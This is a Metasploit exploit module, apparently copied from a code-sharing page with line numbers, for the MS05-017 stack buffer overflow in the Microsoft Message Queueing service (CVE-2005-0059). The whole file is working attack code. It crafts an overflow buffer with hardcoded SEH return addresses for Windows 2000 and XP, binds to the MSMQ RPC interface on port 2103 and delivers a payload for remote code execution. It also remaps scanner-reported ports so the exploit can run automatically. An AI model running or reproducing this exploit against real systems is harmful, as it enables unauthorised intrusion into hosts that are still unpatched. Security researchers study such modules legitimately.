Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10
  include Msf::Exploit::Remote::Seh
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'MS05-017 Microsoft Message Queueing Service Path Overflow',
15
      'Description'    => %q{
16
        This module exploits a stack buffer overflow in the RPC interface
17
        to the Microsoft Message Queueing service. The offset to the
18
        return address changes based on the length of the system
19
        hostname, so this must be provided via the 'HNAME' option.
20
        Much thanks to snort.org and Jean-Baptiste Marchand's
21
        excellent MSRPC website.
22

23
      },
24
      'Author'         => [ 'hdm' ],
25
      'License'        => MSF_LICENSE,
26
      'References'     =>
27
        [
28
          [ 'CVE', '2005-0059'],
29
          [ 'OSVDB', '15458'],
30
          [ 'MSB', 'MS05-017'],
31
          [ 'BID', '13112'],
32
        ],
33
      'Privileged'     => true,
34
      'Payload'        =>
35
        {
36
          'Space'    => 1024,
37
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\xff",
38
          'StackAdjustment' => -3500,
39

40
        },
41
      'Platform'       => %w{ win },
42
      'Targets'        =>
43
        [
44
          [
45
            'Windows 2000 ALL / Windows XP SP0-SP1 (English)',
46
            {
47
              'Platform' => 'win',
48
              'Rets'     => [ 0x004014e9, 0x01001209 ] # mqsvc.exe
49
            },
50
          ],
51
        ],
52
      'DisclosureDate' => '2005-04-12',
53
      'DefaultTarget' => 0))
54

55
    # Change the default port values to point at MSMQ
56
    register_options(
57
      [
58
        Opt::RPORT(2103),
59
        OptString.new('HNAME',  [ true,  "The NetBIOS hostname of the target" ]),
60
      ])
61
  end
62

63
  def autofilter
64
    # Common vulnerability scanning tools report port 445/139
65
    # due to how they test for the vulnerability. Remap this
66
    # back to 2103 for automated exploitation
67

68
    rport = datastore['RPORT'].to_i
69
    if ( rport == 445 or rport == 139 )
70
      datastore['RPORT'] = 2103
71
    end
72

73
    # The NetBIOS hostname is required to exploit this bug reliably.
74
    if (not datastore['HNAME'])
75
      # XXX automatically determine the hostname
76
      return false
77
    end
78

79
    true
80
  end
81

82
  def exploit
83

84
    # MSMQ supports three forms of queue names, the two we can use are
85
    # the IP address and the hostname. If we use the IP address via the
86
    # TCP: format, the offset to the SEH frame will change depending on
87
    # the length of the real hostname. For this reason, we force the user
88
    # to supply us with the actual hostname.
89

90
    # Formats: DIRECT=TCP:IPAddress\QueueName DIRECT=OS:ComputerName\QueueName
91

92
    queue_name = "OS:#{datastore['HNAME']}";
93
    queue_hlen = datastore['HNAME'].length * 2
94
    queue_path = unicode(queue_name + "\\PRIVATE$\\")
95

96
    buf   = rand_text_english(4000, payload_badchars)
97

98
    # Windows 2000 SEH offset goes first
99
    buf[372 - queue_hlen + 0, 4] = [ target['Rets'][0] ].pack('V')
100
    buf[372 - queue_hlen - 4, 2] = "\xeb\x22"
101

102
    # Windows XP SEH offset goes second
103
    seh = generate_seh_payload(target['Rets'][1])
104
    buf[400 - queue_hlen - 4, seh.length] = seh
105

106
    # Append the path to the location and null terminate it
107
    queue_path << buf << "\x00\x00"
108

109
    # Get the unicode length of this string
110
    queue_plen = queue_path.length / 2
111

112
    connect
113
    print_status("Trying target #{target.name}...")
114

115
    handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
116
    print_status("Binding to #{handle} ...")
117
    dcerpc_bind(handle)
118
    print_status("Bound to #{handle} ...")
119

120
    stubdata =
121
      NDR.long(1) +
122
      NDR.long(1) +
123
      NDR.long(1) +
124
      NDR.long(3) +
125
      NDR.long(3) +
126
      NDR.long(2) +
127
      NDR.UnicodeConformantVaryingStringPreBuilt(queue_path)
128

129
    print_status('Sending exploit ...')
130

131
    response = dcerpc.call(9, stubdata)
132

133
    if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
134
      case dcerpc.last_response.stub_data
135
        when "\x20\x00\x0e\xc0"
136
          print_status("The server rejected our request, the HNAME parameter could be incorrect")
137
        when "\x1e\x00\x0e\xc0"
138
          print_status("The server does not appear to be exploitable")
139
        else
140
          print_status("An unknown response was received from the server:")
141
          print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
142
      end
143
    end
144

145
    handler
146
    disconnect
147
  end
148
end
149

150